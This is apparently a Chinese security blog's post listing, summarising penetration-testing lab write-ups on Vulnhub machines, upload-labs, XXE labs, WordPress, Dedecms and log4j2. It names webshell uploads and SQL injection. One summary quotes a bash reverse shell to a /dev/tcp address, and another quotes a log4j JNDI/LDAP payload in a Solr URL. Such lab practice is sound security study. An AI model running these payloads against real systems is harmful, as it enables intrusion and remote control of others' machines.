自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(13)
  • 收藏
  • 关注

原创 Web-Machine-N7靶机通关攻略

打开enter_network目录,提交一次密码,第二次提交时候抓包可以抓到cookie和role。访问exploit.html,发现能提交文件,但是都被提交到了本机,在F12前端修改为目标靶机。打开登录页面,发现需要admin身份,我们抓包修改role字段,得到剩下半个flag。发现role是加密内容采用url,base64和md5解密。扫描ip,端口,目录。发现结果是admin。

2025-03-21 00:25:55 237

原创 Dedecms得getshell流程

1.登录后台发现可以新建文件2.新建一句话木马3.访问成功,成功。

2025-03-20 21:41:42 259

原创 wordpress漏洞getshell

1.在docker启动靶场,使用9595端口,访问。4.我们在网络搜索可得,该PHP文件的目录位置。5.我们拼接url,访问该页面,访问成功。3.我们输入一句话木马,并保存。2.发现他的模板文件可以修改。6.用蚁剑尝试连接,成功。

2025-03-20 19:34:36 332

原创 VULNHUB靶场-matrix-breakout-2-morpheus

发现可以上传抓包查看一下,发现使用post传输,且有上传地址,尝试上传一句话木马,成功。1.arp-scan扫描ip,nmap扫描端口,dirsearch扫描目录。2.访问80端口,访问graffiti.php。使用蚁剑写入php文件,里面写入反弹shell。在kali开启666端口监听。

2025-03-19 20:07:05 181

原创 jocker靶场通关

发送到攻击模块进行如下配置,根据上面的txt文档使用指定的密码本进行爆破,成功发现账号密码。使用账号密码登陆成功,发现使用cms框架,用弱口令尝试登录,成功。1.arp扫描,发现靶机ip为192.168.111.141。发现登录的账号密码被用base64加密。同样使用弱口令登录成功。

2025-03-19 00:13:47 140

原创 billiu靶机getshell

用bp抓包,将show修改为上传的1.jpg的位置,在url后加上所传的参数echo “bash -i >& /dev/tcp/192.168.111.128/8888 0>&1” | bash使其进行反弹shell,我们在kali监听8888端口。4.直接访问ip,访问/test,发现可能存在文件包含漏洞,尝试get和post提交数据,发现post可行。发现可以直接下载文件,下载c.php文件打开发现数据库密码。6.发现进入文件上传页面,制作图片马上传,一句话木马为。2.扫描该主机的端口。

2025-03-18 22:19:50 195

原创 log4j2漏洞攻略

5.使用DNSlog检测dns回显,先申请一个子域名,尝试查看java版本构造url:47.93.4.110:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.jkhjzi.dnslog.cn},访问,返回出java版本,存在漏洞。利用JNDI注入工具把这个反弹shell命令部署到LDAP服务上去,在工具的同目录下输入命令。1.云服务器上启动靶机,查看端口,发现是8983。9.选用以下url,构造url,7.反弹shell的命令。

2025-03-17 16:23:03 335

原创 hackme靶机getshell流程

6.用bp拦截搜索的请求头,保存为1.txt文件在sqlmap目录下,使用sqlmap工具尝试注入。11.登录superadmin,发现可以文件上传,直接上传一句话木马,发现没有拦截规则。8.查看数据库名,发现关键数据库webapphacking,指定该数据库,查看表。10.发现superadmin的密码的MD5值,比较难解,放到网站尝试。2.使用kali的arp扫描同段ip发现靶机IP。5.注册用户并登录,发现搜索框,尝试注入。3.使用dird扫描出目录。7.注入尝试成功,可以注入。

2025-03-13 23:35:45 189

原创 文件解析漏洞靶场解析全集详解

原理:在网站下建立名字为 .asp/.asa 的文件夹,其内的任何拓展名的文件都会被IIS当作asp文件解析并且执行。1.在虚拟机打开win server2003,安装iis服务,查看虚拟机的ip地址,在物理机访问2.在网站根目录新建1.asp目录文件,在目录中新建cao.txt文档,内容为时间函数<% =now();%>3.在物理机打开该文件发现时间函数被执行。

2025-03-13 21:31:21 943

原创 文件上传漏洞tamato打靶记录

6.扫描端口,发现2211端口开启,利用bp向其中传入一句话木马。4.找到敏感文件phpinfo,打开源码,发现提示。1.用kali的arp-scan扫描同段ip。5.使用文件包含漏洞,查看日志文件。2.用dirb扫到目录,尝试打开。7.用蚂剑进行连接,成功。

2025-03-12 22:18:59 206

原创 upload -lib 1-19关

17.用条件竞争绕过,先上传一张正确图片找到上传的位置,开启代理用bp一直攻击靶场,用另外一个浏览器一直访问该目录下的该php文件,直到成功,发现在该目录下找到webshell.php,用哥斯拉连接,密码cmd,成功。13.先在第一关中用抓包上传一个include.php文件,再利用该文件把图片马包含到页面上执行,上传一个图片🐎,获得图片马的地址,再用include.php文件传参读出上传的图片马。16.上传二次渲染后的图片马,用include.php文件传参读出上传的图片马。9.抓包,在后缀后加. .

2025-03-12 01:01:48 385

原创 xxe-lab 通关攻略

2.任意输入用户名和密码,我们发现username有回显,进行抓包尝试,发现用xml传输数据,可以尝试进行xml实体注入。3.讲抓到的数据包发送到重放器,进行修改采用file伪协议抓取d:1.txt文件。1.打开xxe-lab靶场。

2025-03-10 22:10:40 261

原创 XXE靶机通关获得flag

12.在后台管理员登陆页面输入得到的密码和账号得到提示,并打开源码查看,发现目录,打开该目录,发现加密后的flag,通过编码内容可以判断出采用的是base32编码。8.开启代理 打开bp尝试抓包,发现使用xml传输账号,密码,可以尝试xml实体注入。9.发送到重放器,我们知道后台登陆的php文件位置,尝试读取文件,查看是否有账户和密码。13在线解码可得一串新编码,可以发现该编码为base64编码,再次解码可得一个目录。5,使用dirb对目标靶机ip进行扫描,获取靶机的目录信息。

2025-03-10 21:50:20 258

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除